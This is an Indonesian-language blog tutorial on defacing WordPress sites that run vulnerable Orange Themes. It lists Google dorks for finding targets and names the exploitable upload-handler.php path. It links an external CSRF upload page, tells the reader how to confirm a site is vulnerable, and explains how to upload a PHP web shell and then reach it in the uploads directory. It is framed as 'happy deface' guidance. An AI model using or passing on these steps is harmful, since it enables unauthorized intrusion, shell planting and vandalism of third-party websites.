Setelah sebelumnya gua ngepost Tutorial Deface dengan metode Bypass Admin, sekarang gua mau share Tutorial Deface WP Orange Themes, Maybe ini exploit lama, tapi gpp la asal dapet yang perawan + bening. Lanjut bahan & langkah2 ea coek.
Dork : inurl:/wp-content/themes/kernel-theme/
inurl:/wp-content/themes/bordeaux-theme/
inurl:/wp-content/themes/bulteno-theme/
inurl:/wp-content/themes/rayoflight-theme/
Exploit : /wp-content/themes/nama-temanya/functions/upload-handler.php
CSRF : http://kedareddy.com/b.php
Piye om carane?
Pertama dan yang paling utama, dorking dulu la
Pilih gambar terus klik kanan, lalu klik "Open Image in New Tab" , terus tambahin exploitnya
Ex : site.co.li/wp-content/themes/rayoflight-theme/functions/upload-handler.php
Vuln ? muncul tulisan "error"
 |
| kek gini yg vuln |
Terus klik "Jepit" , disitu bakal muncul form uploader, pilih file yang mau lo upload, lalu klik "Cr00t!", Kalo success upload file, nanti muncul nama filemu.
(Kalo pas upload muncul tulisan "No Php" coba buat upload file extensi .html.)
Shell Akses ? site.co.li/wp-content/uploads/(tahun)/(bulan)/file.php
Ex : site.co.li/wp-content/uploads/2018/03/a.php
Oke mungkin segini aja gua ngeshare tutorial pepes. Happy Deface & See you !.
Thx For : Berandal - OWL Squad
Tutorial Deface WP Orange Themes
4/
5
Oleh
ok
